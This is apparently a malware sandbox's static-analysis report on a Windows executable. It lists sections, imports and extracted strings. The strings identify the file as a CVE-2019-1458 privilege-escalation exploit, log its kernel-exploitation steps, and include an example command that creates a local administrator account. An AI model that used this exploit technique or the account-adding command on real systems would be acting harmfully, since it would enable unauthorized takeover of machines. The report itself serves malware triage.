Static | ZeroBOX

PE Compile Time

2021-05-13 03:10:26

PDB Path

E:\work\提权\Exp\x64\Release\ExploitTest.pdb

PE Imphash

4f7cea697bd9dd2a588ec4d74b63531c

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00001000 | 0x000449a3 | 0x00044a00 | 5.78494507734 |
| .rdata | 0x00046000 | 0x00017a4c | 0x00017c00 | 4.48139126069 |
| .data | 0x0005e000 | 0x00002db4 | 0x00000c00 | 2.08251416016 |
| .pdata | 0x00061000 | 0x000035a0 | 0x00003600 | 5.48125814554 |
| _RDATA | 0x00065000 | 0x000000f4 | 0x00000200 | 1.96062040537 |
| .rsrc | 0x00066000 | 0x000001e0 | 0x00000200 | 4.71377258295 |
| .reloc | 0x00067000 | 0x000006c4 | 0x00000800 | 4.99493803793 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_MANIFEST | 0x00066060 | 0x0000017d | LANG_ENGLISH | SUBLANG_ENGLISH_US | XML 1.0 document text |

Imports

Library KERNEL32.dll:
0x140046030 VirtualProtect
0x140046038 VirtualQuery
0x140046040 GetCurrentProcessId
0x140046048 CreatePipe
0x140046050 GetStartupInfoW
0x140046058 lstrcpyW
0x140046060 CreateProcessW
0x140046068 CloseHandle
0x140046070 GetLastError
0x140046078 ReadFile
0x140046080 ExitProcess
0x140046088 VirtualAlloc
0x140046090 GetCurrentProcess
0x140046098 GetCurrentThreadId
0x1400460a0 CreateFileW
0x1400460a8 SetFilePointerEx
0x1400460b0 GetFileSizeEx
0x1400460b8 WriteConsoleW
0x1400460c0 HeapQueryInformation
0x1400460c8 HeapReAlloc
0x1400460d0 HeapFree
0x1400460d8 GetStringTypeW
0x1400460e0 GetModuleHandleA
0x1400460e8 OutputDebugStringW
0x1400460f0 GetProcessHeap
0x1400460f8 SetEnvironmentVariableW
0x140046100 FreeEnvironmentStringsW
0x140046108 GetEnvironmentStringsW
0x140046110 MultiByteToWideChar
0x140046118 GetCPInfo
0x140046120 GetOEMCP
0x140046128 GetACP
0x140046130 IsValidCodePage
0x140046138 FindNextFileW
0x140046140 FindFirstFileExW
0x140046148 FindClose
0x140046150 GetFileAttributesExW
0x140046158 GetExitCodeProcess
0x140046160 WaitForSingleObject
0x140046168 WideCharToMultiByte
0x140046170 GetConsoleMode
0x140046178 GetConsoleOutputCP
0x140046180 FlushFileBuffers
0x140046188 GetFileType
0x140046190 LocalAlloc
0x140046198 LoadLibraryA
0x1400461a0 GetModuleHandleW
0x1400461a8 GetProcAddress
0x1400461b0 SetStdHandle
0x1400461b8 LoadLibraryW
0x1400461c0 RtlCaptureContext
0x1400461c8 RtlLookupFunctionEntry
0x1400461d0 RtlVirtualUnwind
0x1400461d8 UnhandledExceptionFilter
0x1400461e8 TerminateProcess
0x1400461f8 IsDebuggerPresent
0x140046200 QueryPerformanceCounter
0x140046208 GetSystemTimeAsFileTime
0x140046210 InitializeSListHead
0x140046218 RtlUnwindEx
0x140046220 SetLastError
0x140046228 EncodePointer
0x140046230 RaiseException
0x140046238 EnterCriticalSection
0x140046240 LeaveCriticalSection
0x140046248 DeleteCriticalSection
0x140046258 TlsAlloc
0x140046260 TlsGetValue
0x140046268 TlsSetValue
0x140046270 TlsFree
0x140046278 FreeLibrary
0x140046280 LoadLibraryExW
0x140046288 RtlPcToFileHeader
0x140046290 GetModuleHandleExW
0x140046298 GetModuleFileNameW
0x1400462a0 GetStdHandle
0x1400462a8 WriteFile
0x1400462b0 GetCommandLineA
0x1400462b8 GetCommandLineW
0x1400462c0 HeapAlloc
0x1400462c8 HeapSize
0x1400462d0 HeapValidate
0x1400462d8 GetSystemInfo
0x1400462e0 CompareStringW
0x1400462e8 LCMapStringW
Library USER32.dll:
0x1400462f8 TranslateMessage
0x140046300 GetMessageW
0x140046308 TrackPopupMenuEx
0x140046310 AppendMenuA
0x140046318 SetMenuInfo
0x140046320 SetWinEventHook
0x140046328 SetWindowsHookExW
0x140046330 CreateWindowExA
0x140046338 RegisterClassExA
0x140046340 CallNextHookEx
0x140046348 UnregisterClassW
0x140046350 SetKeyboardState
0x140046358 GetKeyboardState
0x140046360 SetWindowLongPtrW
0x140046368 DispatchMessageW
0x140046370 InternalGetWindowText
0x140046378 SetClassLongPtrW
0x140046380 SendMessageW
0x140046388 DrawIconEx
0x140046390 SetWindowLongPtrA
0x140046398 SetWindowLongW
0x1400463a0 DestroyWindow
0x1400463a8 CreateWindowExW
0x1400463b0 CreatePopupMenu
0x1400463b8 RegisterClassExW
0x1400463c0 GetMenuBarInfo
0x1400463c8 PostQuitMessage
0x1400463d0 DefWindowProcW
0x1400463d8 DestroyMenu
0x1400463e0 CreateMenu
0x1400463e8 RegisterClassW
Library GDI32.dll:
0x140046000 GetBitmapBits
0x140046008 SelectObject
0x140046010 CreateCompatibleBitmap
0x140046018 CreateCompatibleDC
0x140046020 SetBitmapBits

!This program cannot be run in DOS mode.
d0Pva1
v`1Dva1
va1Rich
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
@USVWH
L+D$xH
wwwwwwwwH
L$ SVWH
L$ SVWH
H9D$Hr
H9D$Hs
$Hc@<H
D$ H9D$(u
5Genu
5Auth
D$ Hc@<H
H3D$0H
H9D$ u
D$pHc@
D$8HcD$ H
L$@HcI
D$pHc@
D$0Hc@
L$8HcD
H;D$Ht
9D$ s(
L$8HcD
D$,9D$
@XH9D$@s
@XH9D$@u
D$ H9D$@u
D$(Hc@
L$(HcI
D$(Hc@
|$ RCC
|$ MOC
|$ csm
H9D$Xrd
H9D$XsL
H9D$Xu
D$8H9D$0u
H9D$0u
D$@Hc@
D$@Hc@
D$PHc@
D$PHc@
D$PHc@
D$@Hc@
D$$9D$ sAH
D$@Hc@
H9D$Ps
D$@Hc@
D$pHc@
L$xHcI
L$xHcI
L$xH9A
L$`HcI
L$`HcI
L$pHcI
L$pHcI
L$pHcI
L$xHcI
H9D$8tl
L$xHcI
L$pHcI
D$xHc@
I(H9H(u
HcL$ HcD
HcL$ HcD
9D$ ~/D
L$hHcI
HcL$$Hk
L$PHcI
HcL$ Hk
L$PHcI
HcL$ Hk
L$@HcI H
H9D$(r
H9D$(v
D$HH9D$ t"H
H9D$8u
H9D$@t:H
D$0H9D$Ht:H
D$0H9D$Ht:H
ffffff
fffffff
H9D$H~
HcD$4Hk
HcD$4Hk
HcL$4H
HcD$4Hk
t7HcD$ H
HcD$ H
H9D$Xs
H9D$hs
H9D$xs
H9D$Xs
H9D$hs
H9D$xs
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puDH
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puA3
H9D$Ps
H9D$`s
H9D$Xv
H9D$(w
?H9D$Xv
H9D$(w
D$P9D$ }"L
D$P9D$ }&f
D$P9D$ }"L
D$P9D$ }&f
H9D$(s
H9D$(s
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$DH
HcD$DH
HcD$DH
HcD$DH
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
HcD$$H
HcD$$H
(HcD$8H
D$H9D$ }DH
@P9D$4
@P9D$4
@P9D$4
HcD$8H
@P9D$4
HcD$8H
D$(HcD$`H9D$(s
HcD$`H
+HcD$`H9D$ t
D$(HcD$`H9D$(s
HcD$`H
+HcD$`H9D$ t
HcD$`H
D$(H9D$ tZH
HcD$`H
D$(H9D$ t\H
D$ i@(
H9D$0u
D$HH9D$0
#D$H;D$Hu
D$$9D$ t
D$ Hc@<H
HcD$LH
HcD$LH
D$L9D$P}eHcD$PH
H9D$Xs
H9D$xs
8u3E3
D$XH9D$@t
H9D$pr
H9D$xr
H+D$@H;D$8w
x ATAVAWH
0A_A^A\
x ATAVAWH
fA94@u
fA94nu
0A_A^A\
D$`H9D$H
D$PH9D$@rf
D$`H9D$ht
D$0H9D$(r
D$0H9D$(s
D$@H9D$`u
D$HH9D$ht(H
H9D$ t
D$`H9D$0t!H
D$HH9D$ t'H
D$XH9D$(t8H
H9D$ t
D$`H9D$@
D$ H9D$8s
D$,HcD$,H
D$ HcD$,H
D$8H9D$ t"
D$XH9D$H
D$@HkL$H
D$XH9D$Ht:H
D$XH9D$Ht
D$HH9D$@u4H
t$@H;D$Hs
HcL$0H
t$hH;D$ps
D$0H9D$8s*H
H9D$hs
H9D$xs
D$P9D$8r
D$P9D$8u
D$\9D$@v
D$X9D$<r
D$X9D$<u
D$d9D$Hv
D$HH9D$ t"H
H9D$8u
H9D$@t:H
D$0H9D$Ht:H
D$0H9D$Ht:H
D$8H9D$(t
D$8H9D$ t<H
HcD$ H
HcD$ H
t'HcD$ H
D$$HcD$ H
HcD$ H
D$@HcD$(H
D$$9D$
HcD$$H
H+D$PH
D$@H9D$8t
H+D$HH
D$@H9D$8t
H+D$PH
D$@H9D$8t
D$(H9D$ u
H9D$ u
H#D$ H
D$pH9D$`tAH
|$hd|IH
H+D$pH
HcL$DH
HcT$HH
HcD$HH
HcL$PH
|$8d|4
HcL$0H
9D$0ucH
HcD$0H
HcL$4H
HcD$<L
HcD$HH
9D$D|QH
H9D$xs
H9D$xv
HcL$HH
HcD$TH
D$49D$0}-
H9D$0u
H9D$0u
H9D$8s
D$HH9D$8
D$@9D$Dv
D$@9D$Ds.
(HcD$0Hk
(HcD$0Hk
XHcD$`H
D$p9D$@|:H
D$xHcD$xH
D$@9D$X}C
HcL$XHcT$X
D$x9D$\}&HcD$\
D$@9D$l}7
HcD$hL
HcD$@H
D$`HcD$`H;
}OHcD$`
HcD$|H;
HcD$hL
D$dHcD$dH;
}EHcD$d
HcT$dH
D$0H9D$(
D$PH9D$H
D$XH9D$8siH
D$PH9D$Hs]H
D$@9D$Ds!H
D$PH9D$H
D$XH9D$8stH
D$PH9D$HshH
D$@9D$Ds!H
D$pH9D$X
D$xH9D$HsiH
D$pH9D$Xs]H
D$P9D$D
XHcD$`H
D$09D$<t:H
D$09D$<t:H
D$0H9D$Hu
ATAUAWH
L!|$ A
A_A]A\
WATAUAVAWH
0A_A^A]A\_
UWATAVAWH
t(Lc}oH;
A_A^A\_]
t$ WATAUAVAWH
0A_A^A]A\_
@USVWATAUAVAWH
xA_A^A]A\_^[]
H9D$8v H
H9D$`t
H9D$Hv
H9D$8t2H
H9D$8tL
H9D$pu(
H9D$ t
H9D$@v
H9D$8v H
t$HiD$
t$HiD$
|$PArO
|$PZwH
|$ParO
|$PzwH
H9D$ thH
H9D$ t
9D$ w@
9D$ w(
D$hH9D$X
D$hH9D$Xr
H9D$hs
H9D$xs
fD94Fu
WATAUAVAWH
9t$htBH95m
x}I96txI
0A_A^A]A\_
WATAUAVAWH
fB94`t
x~I96tyI
fC94wu
0A_A^A]A\_
WAVAWH
0A_A^_
D$XH9D$Pu
D$XH9D$ t0H
D$XH9D$ u
D$PH9D$ t7H
D$HH9D$@u
D$@H9D$ t+H
HcD$4H
H9D$ht
H9D$ps
H9D$ps
D$XH9D$8
D$0HcD$0H
HcD$0H
D$0H9D$ t
9D$`|XH
HHcD$PH
H9D$ t
HcD$0H
t>HcD$0H
HcD$0H
HcD$ Hk
T$@H9L
(t/HcD$ Hk
HcD$ Hk
HcD$ Hk
t/HcD$ Hk
HcD$ Hk
HcD$0Hk
T$PH9L
(tmHcD$0Hk
HcD$0Hk
HcD$0Hk
HcD$0Hk
HcD$0Hk
ufHcD$0Hk
HcD$0Hk
HcD$0Hk
tQHcD$0Hk
HcD$0Hk
HcD$0Hk
H9D$0u
HcD$ Hk
T$@H9L
(t/HcD$ Hk
HcD$ Hk
HcD$ Hk
t/HcD$ Hk
HcD$ Hk
D$HH9D$ u
H9D$ t
D$XH9D$Pw
|$\Pta
D$$9D$(
D$ HcD$ Hk
HcD$ Hk
HcD$ H=
HcD$ Hk
9D$xr:H
D$hH9D$@u
D$89D$lv
D$p9D$<}
HcL$<H
HcL$<H
;D$8w#
H9D$`v8
D$49D$H
D$49D$Xsx
D$H9D$,
D$L9D$4t]
|$$stV
|$$stb
|$$su!H
|$0sv$H
D$(9D$,t
D$49D$8u
D$49D$8u
D$@H9D$Hu
HHcD$PH
XHcD$`H
H9D$ps
UVWATAUAVAWH
$u-E8n
:u A8N
pA_A^A]A\_^]
t$ WATAUAVAWH
0A_A^A]A\_
D$`H9D$h
D$hH9D$(w/H
D$(H9D$ t`H
D$HH9D$@vPH
D$@H9D$Hs,H
D$HH9D$@wPH
D$XH9D$Hw,H
D$@H9D$8v,H
D$HH9D$8s
D$8H9D$@u
D$8H9D$@sPH
D$@H9D$8v,H
D$8H9D$@rPH
D$PH9D$8v,H
D$8H9D$Ps.HcD$0H
HcD$0H
D$XH9D$Hs
D$XH9D$Hs.HcD$0H
HcD$0H
D$8H9D$Ps
HcD$0H
D$PHcD$0H
HcD$TH
tAHcD$TH
9D$P~!
D$`HcD$`H
tAHcD$`H
H9D$Ps
D$HH9D$Xr
H9D$Ps
D$HH9D$Xr
H9D$Xs
HcD$@H9
H9D$Xs
HcD$@H9
H9D$hs
H9D$0w
XHcD$`H
@9D$(s
D$4HcD$4H
ffffff
fffffff
D$0H9D$ t
HcD$(H
@CH9D$0r5H
H9D$0v
?H9D$0sZH
D$ H9D$Pu
f9D$ u
f9D$ u
HcD$\H
tAHcD$\H
HcD$XH
tAHcD$XH
D$49D$8u
D$0Hc@<H
H9D$8r H
H9D$8s
$Hc@<H
:cD$ @
:cD$ @
:cD$ @
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
Unknown exception
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
(null)
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
CorExitProcess
COMSPEC
cmd.exe
minkernel\crts\ucrt\inc\corecrt_internal_traits.h
minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp
minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
Normal
Ignore
Client
Client hook allocation failure at file %hs line %d.
Client hook allocation failure.
Error: memory allocation: bad memory block type.
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure.
Error: memory allocation: bad memory block type.
Memory allocated at %hs(%d).
The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()
Error: possible heap corruption at or near 0x%p
The Block at 0x%p was allocated by aligned routines, use _aligned_free()
Client hook free failure.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
DAMAGED
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.
%hs located at 0x%p is %Iu bytes long.
Memory allocated at %hs(%d).
%hs located at 0x%p is %Iu bytes long.
Cycle in block list detected while processing block located at 0x%p.
Heap validation failed.
Bad memory block found at 0x%p.
Memory allocated at %hs(%d).
Bad memory block found at 0x%p.
Data: <%s> %s
Dumping objects ->
#File Error#(%d) :
%hs(%d) :
{%ld}
client block at 0x%p, subtype %x, %Iu bytes long.
normal block at 0x%p, %Iu bytes long.
crt block at 0x%p, subtype %x, %Iu bytes long.
Object dump complete.
Detected memory leaks!
<program name unknown>
AreFileApisANSI
CompareStringEx
GetActiveWindow
GetLastActivePopup
GetProcessWindowStation
GetUserObjectInformationW
LCMapStringEx
LocaleNameToLCID
MessageBoxA
MessageBoxW
AppPolicyGetProcessTerminationMethod
AppPolicyGetShowDeveloperDiagnostic
AppPolicyGetWindowingModel
minkernel\crts\ucrt\src\appcrt\internal\per_thread_data.cpp
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
minkernel\crts\ucrt\src\desktopcrt\exec\spawnv.cpp
minkernel\crts\ucrt\src\desktopcrt\exec\spawnvp.cpp
minkernel\crts\ucrt\inc\corecrt_internal_win32_buffer.h
minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
minkernel\crts\ucrt\src\desktopcrt\env\setenv.cpp
minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
Second Chance Assertion Failed: File
<file unknown>
, Line
_CrtDbgReport: String too long or IO Error
Assertion failed:
Assertion failed!
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
minkernel\crts\ucrt\src\desktopcrt\exec\cenvarg.cpp
minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
UUUUUU
UUUUUU
minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp
minkernel\crts\ucrt\src\appcrt\locale\comparestringa.cpp
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
IsMenu
gSharedInfo
user32.dll
Failed to load user32
Failed to find location of exported function 'IsMenu' within user32.dll
Failed to find offset of HMValidateHandle from location of 'IsMenu'
MagciHwnd==%p
[!] Failed to locate HmValidateHandle, exiting
NtUserConsoleControl
win32u.dll
NtCallbackReturn
ntdll.dll
CreateWnd
Hwnd:%08x qwfirstEntryDesktop=%p
BaseAddress:%p RegionSize=:%p
Min BaseAddress:%p RegionSize=:%p
realMagicHwnd=%p
dwRet=%p
tagWndMin_offset_0x128=%p
g_qwExpLoit=%p
qwFrist read=%p
qwSecond read=%p
qwFourth read=%p
qwFifth read=%p
qwSixth read=%p
[!] CreateProcessW Failed![%lx]
[+] ProcessCreated with pid %d!
===============================
Usage: %S command
Example: %S "net user admin admin /ad & net user localgroup administrators admin /ad"
[+]hExploitBit Handle address: %p
[+]Peb Pointer address : %p
[+]GdiSharedHandleTable Pointer address: %p
[+]dwExpBitmapObj Lookup address: %p
[+]oob_target address: %p
[-] Ran out of memory allocating Bitmaps
[+] Find hManager = %p
[+] Find hWorker = %p
[+] GetBitMapBits/Reading using oob_target...
TriggerExploit
Creating ExploitWnd
[!] CreateWindowEx error 0x%x!
[*] tagWND: 0x%p
hManager 0x%p
hWorker 0x%p
[!] GetBitmapBits error 0x%x!
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
Usage: %S command
Example: %S "net user admin admin /ad & net user localgroup administrators admin /ad"
WARNING: YOU ONLY HAVE ONE CHANCE!!!
RtlGetVersion
[!] This version of system was not supported (%d.%d)
[!] Failed to map 0x%p (0x%p), exiting (%llx)
[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx
[*] Registering window
[-] Failed registering SploitWnd window class
[*] Creating instance of this window
[-] Failed to create SploitWnd window
[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window 0x%p
[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced
[*] GetLastError = %x
[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130
[*] Simulating alt key press
[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time
[+] Exploit success!
[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx
NtAllocateVirtualMemory
SparyClass
SparyClass2
WNDCLASSMAIN
E:\work\
\Exp\x64\Release\ExploitTest.pdb
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
LoadLibraryW
GetProcAddress
GetModuleHandleW
LoadLibraryA
LocalAlloc
GetModuleHandleA
VirtualProtect
VirtualQuery
GetCurrentProcessId
CreatePipe
GetStartupInfoW
lstrcpyW
CreateProcessW
CloseHandle
GetLastError
ReadFile
ExitProcess
VirtualAlloc
GetCurrentProcess
GetCurrentThreadId
KERNEL32.dll
CreateMenu
DestroyMenu
DefWindowProcW
PostQuitMessage
GetMenuBarInfo
RegisterClassExW
CreatePopupMenu
CreateWindowExW
DestroyWindow
SetWindowLongW
SetWindowLongPtrA
DrawIconEx
SendMessageW
SetClassLongPtrW
InternalGetWindowText
RegisterClassW
SetWindowLongPtrW
GetKeyboardState
SetKeyboardState
UnregisterClassW
CallNextHookEx
RegisterClassExA
CreateWindowExA
SetWindowsHookExW
SetWinEventHook
SetMenuInfo
AppendMenuA
TrackPopupMenuEx
GetMessageW
TranslateMessage
DispatchMessageW
USER32.dll
CreateCompatibleDC
CreateCompatibleBitmap
SelectObject
GetBitmapBits
SetBitmapBits
GDI32.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
IsDebuggerPresent
QueryPerformanceCounter
GetSystemTimeAsFileTime
InitializeSListHead
RtlUnwindEx
SetLastError
EncodePointer
RaiseException
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
RtlPcToFileHeader
GetModuleHandleExW
GetModuleFileNameW
GetStdHandle
WriteFile
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapSize
HeapValidate
GetSystemInfo
CompareStringW
LCMapStringW
GetFileType
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
WideCharToMultiByte
WaitForSingleObject
GetExitCodeProcess
GetFileAttributesExW
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
GetProcessHeap
OutputDebugStringW
SetStdHandle
GetStringTypeW
HeapFree
HeapReAlloc
HeapQueryInformation
WriteConsoleW
GetFileSizeEx
SetFilePointerEx
CreateFileW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
cached_handle == INVALID_HANDLE_VALUE
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp
cached_handle == new_handle
cached_fp == invalid_function_sentinel()
cached_fp == new_fp
to->_What == nullptr && to->_DoFree == false
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp
ts != nullptr
minkernel\crts\ucrt\src\appcrt\time\time.cpp
common_timespec_get
public_stream != nullptr
( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))
minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required
stream != nullptr
minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
common_vfprintf
format != nullptr
common_vsprintf
buffer_count == 0 || buffer != nullptr
common_vsprintf_s
buffer != nullptr && buffer_count > 0
("Buffer too small", 0)
common_vsnprintf_s
_format_it != nullptr
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
("Incorrect format specifier", 0)
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::process
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::process
("N length modifier not specifier", false)
_length == length_modifier::none
state_case_normal_common()
_context != nullptr
__crt_stdio_output::string_output_adapter<wchar_t>::validate
__crt_stdio_output::string_output_adapter<char>::validate
_state == state::normal || _state == state::type
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::state_case_size
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::state_case_normal
_stream.valid()
__crt_stdio_output::stream_output_adapter<wchar_t>::validate
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::state_case_size
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::state_case_normal
__crt_stdio_output::stream_output_adapter<char>::validate
__crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string
("'n' format specifier disabled", 0)
("Invalid integer length modifier", 0)
__crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_state_at_end_of_format_string
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::type_case_n
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::type_case_n
(null)
_format_char != '\0'
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::state_case_normal_tchar
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::process
